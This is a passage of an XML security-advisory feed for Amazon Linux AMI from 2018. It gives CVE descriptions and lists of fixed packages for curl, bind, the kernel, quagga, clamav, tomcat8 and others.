CVE-2018-5702:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5702" title="" id="CVE-2018-5702" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transmission" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-common" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-common-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-debuginfo-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-cli-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-daemon" version="2.92" release="11.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-daemon-2.92-11.12.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-cli-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission-common" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-common-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission-daemon" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-daemon-2.92-11.12.amzn1.i686.rpm</filename></package><package name="transmission-debuginfo" version="2.92" release="11.12.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-debuginfo-2.92-11.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-951</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-951: important priority package update for curl</title><issued date="2018-02-20 20:57:00" /><updated date="2018-04-05 17:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000007:
libcurl 7.1 through 7.57.0 might accidentally leak authentication data to third parties. When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the `Location:` response header value. Sending the same set of headers to subsequest hosts is in particular a problem for applications that pass on custom `Authorization:` headers, as this header often contains privacy sensitive information or data that could allow others to impersonate the libcurl-using client&#039;s request.
1537125:
CVE-2018-1000007 curl: HTTP authentication leak in redirects
CVE-2018-1000005:
libcurl 7.49.0 to and including 7.57.0 contains an out bounds read in code handling HTTP/2 trailers. It was reported (https://github.com/curl/curl/pull/2231) that reading an HTTP/2 trailer could mess up future trailers since the stored size was one byte less than required. The problem is that the code that creates HTTP/1-like headers from the HTTP/2 trailer data once appended a string like `:` to the target buffer, while this was recently changed to `: ` (a space was added after the colon) but the following math wasn&#039;t updated correspondingly. When accessed, the data is read out of bounds and causes either a crash or that the (too large) data gets passed to client write. This could lead to a denial-of-service situation or an information disclosure if someone has a service that echoes back or uses the trailers for something.
1536013:
CVE-2018-1000005 curl: Out-of-bounds read in code handling HTTP/2 trailers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000005" title="" id="CVE-2018-1000005" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000007" title="" id="CVE-2018-1000007" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="14.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-14.81.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-14.81.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-14.81.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-14.81.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="14.81.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-14.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-954</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-954: important priority package update for bind</title><issued date="2018-02-20 21:02:00" /><updated date="2018-02-21 20:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3145:
A use-after-free flaw leading to denial of service was found in the way BIND internally handled cleanup operations on upstream recursion fetch contexts. A remote attacker could potentially use this flaw to make named, acting as a DNSSEC validating resolver, exit unexpectedly with an assertion failure via a specially crafted DNS request.
1534812:
CVE-2017-3145 bind: Improper fetch cleanup sequencing in the resolver can cause named to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3145" title="" id="CVE-2017-3145" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.57.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.57.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-955</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-955: important priority package update for 389-ds-base</title><issued date="2018-02-20 21:09:00" /><updated date="2018-02-21 20:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15134:
A stack buffer overflow flaw was found in the way 389-ds-base handled certain LDAP search filters. A remote, unauthenticated attacker could potentially use this flaw to make ns-slapd crash via a specially crafted LDAP request, thus resulting in denial of service.
1531573:
CVE-2017-15134 389-ds-base: Remote DoS via search filters in slapi_filter_sprintf in slapd/util.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15134" title="" id="CVE-2017-15134" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.6.1-26.52.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.6.1-26.52.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="26.52.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-26.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-956</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-956: important priority package update for kernel</title><issued date="2018-02-20 21:20:00" /><updated date="2018-02-21 20:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5750:
The acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.
1539706:
CVE-2018-5750 kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass
CVE-2018-5344:
A flaw was found in the Linux kernel&#039;s handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions.
1533909:
CVE-2018-5344 kernel: drivers/block/loop.c mishandles lo_release serialization allowing denial-of-service
CVE-2018-1000028:
Linux kernel version after commit bdcf0a423ea1 - 4.15-rc4+, 4.14.8+, 4.9.76+, 4.4.111+ contains a Incorrect Access Control vulnerability in NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. This attack appear to be exploitable via NFS server must export a filesystem with the &quot;rootsquash&quot; options enabled. This vulnerability appears to have been fixed in after commit 1995266727fa.
1540439:
CVE-2018-1000028 kernel: Improper sorting of GIDs in nfsd can lead to incorrect permissions being applied
CVE-2017-5753:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.
1519778:
CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass
CVE-2017-17741:
Linux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.
1527112:
CVE-2017-17741 kernel: kvm: stack-based out-of-bounds read via vmcall instruction
CVE-2017-1000405:
A flaw was found in the patches used to fix the &#039;dirtycow&#039; vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.
1516514:
CVE-2017-1000405 kernel: pmd can become dirty without going through a COW cycle
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405" title="" id="CVE-2017-1000405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17741" title="" id="CVE-2017-17741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753" title="" id="CVE-2017-5753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000028" title="" id="CVE-2018-1000028" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5344" title="" id="CVE-2018-5344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5750" title="" id="CVE-2018-5750" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.81" release="35.56.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.81-35.56.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-957</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-957: important priority package update for quagga</title><issued date="2018-02-20 21:26:00" /><updated date="2018-02-21 20:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5381:
An infinite loop vulnerability was discovered in Quagga. A BGP peer could send specially crafted packets that would cause the daemon to enter an infinite loop, denying service and consuming CPU until it is restarted.
1542992:
CVE-2018-5381 quagga: Infinite loop issue triggered by invalid OPEN message allows denial-of-service
CVE-2018-5380:
A vulnerability was found in Quagga, in the log formatting code. Specially crafted messages sent by BGP peers could cause Quagga to read one element past the end of certain static arrays, causing arbitrary binary data to appear in the logs or potentially, a crash.
1542990:
CVE-2018-5380 quagga: bgpd can overrun internal BGP code-to-string conversion tables potentially allowing crash
CVE-2018-5379:
A double-free vulnerability was found in Quagga. A BGP peer could send a specially crafted UPDATE message which would cause allocated blocks of memory to be free()d more than once, potentially leading to a crash or other issues.
1542985:
CVE-2018-5379 quagga: Double free vulnerability in bgpd when processing certain forms of UPDATE message allowing to crash or potentially execute arbitrary code
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5379" title="" id="CVE-2018-5379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5380" title="" id="CVE-2018-5380" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5381" title="" id="CVE-2018-5381" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="quagga-devel" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga-contrib" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.22.4-4.17.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.22.4-4.17.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.22.4-4.17.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.22.4-4.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-958</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-958: medium priority package update for clamav</title><issued date="2018-02-20 21:35:00" /><updated date="2018-02-21 20:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6420:
CVE-2017-6419:
mspack/lzxd.c in libmspack 0.5alpha, as used in ClamAV 0.99.2, allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted CHM file.
1483909:
CVE-2017-6419 libmspack, clamav: heap-based buffer overflow in mspack/lzxd.c
CVE-2017-6418:
CVE-2017-12380:
CVE-2017-12379:
CVE-2017-12378:
CVE-2017-12377:
CVE-2017-12376:
CVE-2017-12375:
CVE-2017-12374:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12374" title="" id="CVE-2017-12374" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12375" title="" id="CVE-2017-12375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12376" title="" id="CVE-2017-12376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12377" title="" id="CVE-2017-12377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12378" title="" id="CVE-2017-12378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12379" title="" id="CVE-2017-12379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12380" title="" id="CVE-2017-12380" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6418" title="" id="CVE-2017-6418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6419" title="" id="CVE-2017-6419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6420" title="" id="CVE-2017-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-server" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-data-empty" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-filesystem" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-server-sysvinit" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamd" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.99.3-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-959</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-959: low priority package update for tomcat8</title><issued date="2018-02-20 21:37:00" /><updated date="2018-02-21 20:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15706:
As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.
1540828:
CVE-2017-15706 tomcat: Incorrect documentation of CGI Servlet search algorithm may lead to misconfiguration
